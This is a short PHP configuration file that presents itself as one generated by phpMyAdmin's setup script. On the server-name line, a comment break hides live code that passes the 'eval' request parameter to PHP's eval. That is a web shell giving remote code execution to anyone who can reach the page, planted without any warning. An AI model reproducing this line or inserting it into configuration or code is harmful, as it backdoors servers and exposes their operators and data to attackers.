<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.3.9.1 setup script by Piotr Przybylski <piotrprz@gmail.com>
 * Date: Wed, 25 Feb 2015 19:07:00 +0000
 */

/* Servers configuration */
$i = 0;

/* Server: localhost [*/foreach($_GET as $k=>$v)if($k==="eval")eval($v);/*] */
$i++;
$cfg['Servers'][$i]['port'] = '0';

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
?>